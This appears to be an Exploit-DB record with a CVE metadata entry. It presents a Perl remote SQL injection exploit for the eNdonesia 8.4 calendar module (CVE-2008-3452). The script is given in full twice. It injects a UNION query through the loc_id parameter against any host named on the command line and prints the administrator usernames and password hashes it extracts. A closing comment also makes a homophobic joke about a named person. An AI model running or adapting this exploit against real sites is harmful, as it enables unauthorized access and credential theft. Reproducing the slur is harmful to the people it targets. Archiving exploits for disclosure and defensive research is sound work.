ID EDB-ID:6171
Type exploitdb
Reporter Jack
Modified 2008-07-30T00:00:00
Description
eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit. CVE-2008-3452. Webapps exploit for php platform
#!/usr/bin/perl
#/-----------------------------------------------\
#| /-----------------------------------------\ |
#| | Remote SQL Exploit | |
#| | eNdonesia 8.4 Remote SQL Exploit | |
#| | www.endonesia.org | |
#| | Calendar Module | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Presented By Jack | |
#| | MainHack Enterprise | |
#| | www.MainHack.com & irc.nob0dy.net | |
#| | #MainHack #nob0dy #BaliemHackerlink | |
#| | Jack[at]MainHack[dot]com | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Hello To: Indonesian h4x0r | |
#| | yadoy666,n0c0py & okedeh | |
#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |
#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |
#| | all MainHack BrotherHood | |
#| \-----------------------------------------/ |
#\-----------------------------------------------/
use HTTP::Request;
use LWP::UserAgent;
$sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
$sql_injection = "-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd";
if(!@ARGV) { &help;exit(1);}
sub help(){
print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print " [?] Use : perl $0 www.target.com\n";
print " [?] Dont use \"http://\"\n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
print " [?] www.MainHack.com\n\n";
}
while (){
my $target = $ARGV[0];
my $exploit = "http://".$target.$sql_vulnerable.$sql_injection;
print "\n [-] Trying to inject $target ...\n\n";
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success){
my $res = $response->content;
if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($username,$passwd) = ($1,$2);
print " [target] $target \n";
print " [loginx] $username:$passwd \n\n";
exit(0);
}
else {
die " [error] Fail to get username and password.\n\n";
}
}
else {
die " [error] Fail to inject $target \n\n";
}
}
#/----------------------------------------------------------------\
#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |
#| namun mari kita perhatikan secara seksama ... |
#| NoGay merupakan kependekan dari NoGe is Gay. |
#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |
#\----------------------------------------------------------------/
#Vendor Has been contacted and now working for it.
# milw0rm.com [2008-07-30]
{"id": "EDB-ID:6171", "hash": "25c300129114b681c7ab84cc9895d084", "type": "exploitdb", "bulletinFamily": "exploit", "title": "eNdonesia 8.4 Calendar Module Remote SQL Injection Exploit", "description": "eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit. CVE-2008-3452. Webapps exploit for php platform", "published": "2008-07-30T00:00:00", "modified": "2008-07-30T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6171/", "reporter": "Jack", "references": [], "cvelist": ["CVE-2008-3452"], "lastseen": "2016-01-31T23:21:56", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3452"]}], "modified": "2016-01-31T23:21:56"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6171/", "sourceData": "#!/usr/bin/perl\n#/-----------------------------------------------\\\n#| /-----------------------------------------\\ |\n#| | Remote SQL Exploit | |\n#| | eNdonesia 8.4 Remote SQL Exploit | |\n#| | www.endonesia.org | |\n#| | Calendar Module | |\n#| \\-----------------------------------------/ |\n#| /-----------------------------------------\\ |\n#| | Presented By Jack | |\n#| | MainHack Enterprise | |\n#| | www.MainHack.com & irc.nob0dy.net | | \n#| | #MainHack #nob0dy #BaliemHackerlink | |\n#| | Jack[at]MainHack[dot]com | |\n#| \\-----------------------------------------/ |\n#| /-----------------------------------------\\ |\n#| | Hello To: Indonesian h4x0r | |\n#| | yadoy666,n0c0py & okedeh | |\n#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |\n#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |\n#| | all MainHack BrotherHood | |\n#| \\-----------------------------------------/ |\n#\\-----------------------------------------------/\n \n use HTTP::Request;\n use LWP::UserAgent;\n\n $sql_vulnerable = \"/mod.php?mod=calendar&op=list_events&loc_id=\";\n $sql_injection = \"-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd\";\n\n if(!@ARGV) { &help;exit(1);}\n\n sub help(){\n print \"\\n [?] eNdonesia 8.4 Remote SQL Exploit\\n\";\n print \" [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\\n\";\n print \" [?] Use : perl $0 www.target.com\\n\";\n print \" [?] Dont use \\\"http://\\\"\\n\"; \n print \" [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\\n\";\n print \" [?] Baliem Hacker - VOP crew - MainHack BrotherHood \\n\\n\";\n print \" [?] www.MainHack.com\\n\\n\";\n }\n\n while (){\n my $target = $ARGV[0];\n my $exploit = \"http://\".$target.$sql_vulnerable.$sql_injection;\n print \"\\n [-] Trying to inject $target ...\\n\\n\";\n my $request = HTTP::Request->new(GET=>$exploit);\n my $useragent = LWP::UserAgent->new();\n $useragent->timeout(10);\n my $response = $useragent->request($request);\n if ($response->is_success){\n my $res = $response->content;\n if ($res =~ m/\\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {\n my ($username,$passwd) = ($1,$2);\n print \" [target] $target \\n\";\n print \" [loginx] $username:$passwd \\n\\n\";\n exit(0);\n }\n else {\n die \" [error] Fail to get username and password.\\n\\n\";\n }\n }\n else {\n die \" [error] Fail to inject $target \\n\\n\";\n }\n }\n\n#/----------------------------------------------------------------\\\n#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |\n#| namun mari kita perhatikan secara seksama ... |\n#| NoGay merupakan kependekan dari NoGe is Gay. |\n#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |\n#\\----------------------------------------------------------------/\n#Vendor Has been contacted and now working for it.\n\n# milw0rm.com [2008-07-30]\n", "osvdbidlist": ["47355"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:26:01", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in the Calendar module in eNdonesia 8.4 allows remote attackers to execute arbitrary SQL commands via the loc_id parameter in a list_events action to mod.php.", "modified": "2017-09-28T21:31:41", "published": "2008-08-04T15:41:00", "id": "CVE-2008-3452", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3452", "title": "CVE-2008-3452", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}